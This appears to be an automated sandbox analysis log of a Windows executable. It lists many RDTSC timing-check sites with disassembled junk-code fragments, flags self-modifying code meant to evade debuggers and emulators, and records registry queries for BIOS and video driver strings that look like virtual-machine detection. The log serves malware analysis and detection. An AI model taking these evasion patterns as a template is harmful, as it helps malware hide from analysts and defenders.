                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED38E6 second address: ED38FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F60F12493A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3CE0 second address: ED3CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E88 second address: ED3E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E9D second address: ED3EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F113721Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4006 second address: ED400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED400C second address: ED4010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4169 second address: ED4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4173 second address: ED4184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F60F1137216h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48E9 second address: ED48EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48EF second address: ED48F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48F3 second address: ED48F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48F7 second address: ED48FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48FD second address: ED4919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F60F12493B2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4919 second address: ED493A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED493A second address: ED4971 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F12493A6h 0x00000008 je 00007F60F12493A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F60F12493AFh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F60F12493B6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED90E7 second address: ED9103 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F1137224h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9103 second address: ED9112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F60F12493A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9112 second address: ED9116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9116 second address: ED913C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F12493AAh 0x00000013 jmp 00007F60F12493AEh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED913C second address: ED9142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC182 second address: EDC1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F60F12493B7h 0x00000014 jl 00007F60F12493A6h 0x0000001a push eax 0x0000001b pop eax 0x0000001c ja 00007F60F12493A6h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC1C2 second address: EDC1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F1137228h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE92DA second address: EE92E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8E23 second address: EE8E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC964 second address: EEC970 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC970 second address: EEC986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEA00 second address: EFEA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F60F12493A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEA12 second address: EFEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEA16 second address: EFEA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F03E5E second address: F03E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F040BF second address: F040E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F60F12493B0h 0x0000000a pushad 0x0000000b jnp 00007F60F12493A6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F040E4 second address: F040EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F040EA second address: F040EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04240 second address: F04244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F044D4 second address: F04512 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60F12493A6h 0x00000008 jmp 00007F60F12493B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60F12493B1h 0x00000016 push edi 0x00000017 js 00007F60F12493A6h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04F97 second address: F04FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F1137216h 0x00000008 jmp 00007F60F113721Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F04FB0 second address: F04FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A731 second address: F0A747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A47F second address: F0A48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A48A second address: F0A492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F150E4 second address: F150EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14F09 second address: F14F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DD16 second address: F1DD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DD1A second address: F1DD38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F1137228h 0x0000000c jmp 00007F60F1137222h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DD38 second address: F1DD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DD3E second address: F1DD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F60F1137216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DD48 second address: F1DD4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DD4C second address: F1DD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jns 00007F60F113721Ch 0x00000011 pushad 0x00000012 jmp 00007F60F1137221h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB6F second address: F1DB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F60F12493B3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB8B second address: F1DB9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F60F113721Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB9B second address: F1DBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DBA2 second address: F1DBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2B8ED second address: F2B90E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60F12493B9h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2B90E second address: F2B922 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F60F113721Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A67F second address: F3A685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A685 second address: F3A68F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F1137216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A68F second address: F3A6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F60F12493B8h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A6B1 second address: F3A6B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A6B7 second address: F3A6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A6D4 second address: F3A6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A807 second address: F3A80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3AACE second address: F3AAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3B0E8 second address: F3B0EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3B0EE second address: F3B104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3B104 second address: F3B115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3B115 second address: F3B12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F60F1137222h 0x0000000f jnl 00007F60F1137216h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3B12C second address: F3B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3B134 second address: F3B13F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E460 second address: F3E46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E46C second address: F3E471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E471 second address: F3E47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E47D second address: F3E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40DA9 second address: F40DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40DAE second address: F40DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40E4B second address: F40E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F40E51 second address: F40E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F410D3 second address: F410D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F410D7 second address: F41120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F60F1137218h 0x0000000c popad 0x0000000d nop 0x0000000e mov dx, E42Eh 0x00000012 jmp 00007F60F1137227h 0x00000017 push 00000004h 0x00000019 movsx edx, dx 0x0000001c mov edx, dword ptr [ebp+122D290Ch] 0x00000022 push 143D95A1h 0x00000027 js 00007F60F1137224h 0x0000002d push eax 0x0000002e push edx 0x0000002f js 00007F60F1137216h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42CCF second address: F42CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42CD3 second address: F42CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F60F1137216h 0x0000000d jnl 00007F60F1137216h 0x00000013 jmp 00007F60F113721Fh 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42CFC second address: F42D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42810 second address: F42826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F60F113721Fh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44956 second address: F4495C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D026E second address: 54D0288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0288 second address: 54D028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D028E second address: 54D029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D029C second address: 54D02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02A4 second address: 54D02AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02AA second address: 54D02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D02AE second address: 54D02B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0369 second address: 54D036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D036F second address: 54D0375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0375 second address: 54D03DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ah, 95h 0x0000000c push edi 0x0000000d mov dl, al 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F60F12493ABh 0x00000018 pushfd 0x00000019 jmp 00007F60F12493B8h 0x0000001e and eax, 2C2F01B8h 0x00000024 jmp 00007F60F12493ABh 0x00000029 popfd 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov eax, edx 0x00000031 call 00007F60F12493B7h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D03DE second address: 54D0400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D0400 second address: 54D041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D041D second address: 54D044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F1137228h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54D044F second address: 54D045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E618F4 second address: E618FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F60F1137216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E618FE second address: E61902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E5687E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E67C0F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CB1AED instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EDEBAA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
